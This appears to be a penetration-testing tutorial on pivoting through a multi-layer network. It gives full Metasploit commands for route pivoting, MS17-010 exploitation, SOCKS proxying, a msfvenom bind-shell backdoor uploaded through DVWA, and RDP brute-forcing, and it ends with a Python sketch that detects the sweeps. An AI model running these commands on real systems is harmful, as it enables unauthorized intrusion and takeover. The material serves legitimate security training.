Suppose there is a multi-layer network environment in which each layer's target communicates only with the adjacent servers. How do we break through from the attacker's laptop and obtain system privileges on the layer 4 target, Server5?

First, we obtained Server1 privileges through a web intrusion and moved laterally to Server2, where we learned that Server2 has Internet access and two network cards. Here, we use Server2 as a springboard for the attacker to continue the attack.

Layer 1 target → Layer 2 target

1. Get the intranet segment information.
    meterpreter > run get_local_subnets
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    Local subnet: 10.0.0.0/255.255.255.0
    Local subnet: 10.0.1.0/255.255.255.0
Querying the local routes on the intranet host shows that the intranet segment address is 10.0.1.0/24.

2. Add a static route for the layer 2 intranet segment (10.0.1.0/24).
    meterpreter > run autoroute -s 10.0.1.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 10.0.1.0/255.255.255.0...
    [+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
    [*] Use the -p option to list all active routes

3. Scan the intranet hosts, using the msf scanner module to check the IPs for the MS17-010 vulnerability.
    use auxiliary/scanner/smb/smb_ms17_010
    show options
    set rhosts 10.0.1.0/24
    set threads 50
    run
The scan found that 10.0.1.2 has the MS17-010 vulnerability.

4. Obtain system privileges on Server3 through the MS17-010 vulnerability.
    use exploit/windows/smb/ms17_010_psexec
    set rhost 10.0.1.2
    set payload windows/meterpreter/bind_tcp
    run
5. The second-layer target's privileges were obtained successfully. Checking its IP addresses reveals a third segment.

Layer 2 target → Layer 3 target

1. Add a static route for the third segment.
    meterpreter > run autoroute -s 10.0.2.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 10.0.2.0/255.255.255.0...
    [+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
    [*] Use the -p option to list all active routes
2. The MS17-010 scan found nothing, but host 10.0.2.2 was found to be alive. Use msf to set up a SOCKS proxy.
    use auxiliary/server/socks4a
    set srvport 9999
    run
3. On the attacker's Kali machine, modify the configuration file /etc/proxychains.conf:
    socks4 10.0.0.2 9999
4. Use proxychains to scan the ports of the third-layer target:
    proxychains nmap -Pn -sT 10.0.2.2 -p1-1000
5. Set the SOCKS proxy in Firefox.

The third-layer target can now be accessed directly from the local machine. In DVWA, upload an msf backdoor through the arbitrary file upload to obtain site privileges.

6. Use msfvenom to generate the Trojan backdoor:
    msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe
Handler on the attacking machine:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/bind_tcp
    set RHOST 10.0.2.2
    set LPORT 8888
    set ExitOnSession false
    exploit -j -z
7. In the webshell, shell.exe is uploaded and executed successfully, and Server4 privileges are returned.

Layer 3 target → Layer 4 target

1. Add a static route for the fourth segment.
    meterpreter > run autoroute -s 10.0.3.0/24
    [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
    [!] Example: run post/multi/manage/autoroute OPTION=value [...]
    [*] Adding a route to 10.0.3.0/255.255.255.0...
    [+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
    [*] Use the -p option to list all active routes
2. Use msf to start a SOCKS proxy.
    use auxiliary/server/socks4a
    set srvport 6666
    run
3. Probe the live hosts on the fourth segment. 10.0.3.2 is found to have port 3389 open.
    proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389
4. Forward the port 3389 traffic through the proxy server.

5. Locally, brute-force the RDP account and password:

6. After the brute force succeeds, log in to the server with the account and password.
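
Seen from the defending side, two steps of this walkthrough stand out in flow logs: the smb_ms17_010 sweep of a whole /24 on TCP 445, and the inbound connection to the bind_tcp listener on port 8888 of a server that should only serve the web. The detection sketch below is an added example, not part of the original article; the flow records, the source addresses 10.0.1.1 and 10.0.2.1, and the EXPECTED inventory are constructed assumptions.

```python
from collections import defaultdict

# Constructed flow records (epoch seconds, src, dst, dst port); not from the article.
# 10.0.1.1 and 10.0.2.1 are assumed addresses of the pivot hosts' second interfaces.
FLOWS = (
    [(100 + i // 50, "10.0.1.1", f"10.0.1.{i}", 445) for i in range(2, 60)]  # SMB sweep
    + [(400, "10.0.2.1", "10.0.2.2", 80),      # ordinary web request
       (460, "10.0.2.1", "10.0.2.2", 8888),    # connection to a bind_tcp listener
       (500, "10.0.2.9", "10.0.2.2", 80)]
)
# Assumed inventory: ports each server is expected to accept connections on.
EXPECTED = {"10.0.2.2": {80}, "10.0.3.2": {3389}}

def smb_sweeps(flows, window=10, threshold=20):
    """Map each source that reaches >= threshold distinct hosts on TCP 445
    inside a sliding `window` (seconds) to the largest host count seen."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == 445:
            by_src[src].append((ts, dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {dst for _, dst in events[start:end + 1]}
            if len(distinct) >= threshold:
                hits[src] = max(hits.get(src, 0), len(distinct))
    return hits

def unexpected_listeners(flows, expected):
    """Connections to inventoried servers on ports outside their expected set."""
    return sorted({(src, dst, dport) for _, src, dst, dport in flows
                   if dst in expected and dport not in expected[dst]})

if __name__ == "__main__":
    print("SMB sweep sources:", smb_sweeps(FLOWS))
    print("Unexpected listener connections:", unexpected_listeners(FLOWS, EXPECTED))
```

Because each layer only talks to its neighbours, both signals show up with the compromised neighbour as the source, so the alerts also identify which host is being used as the springboard.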
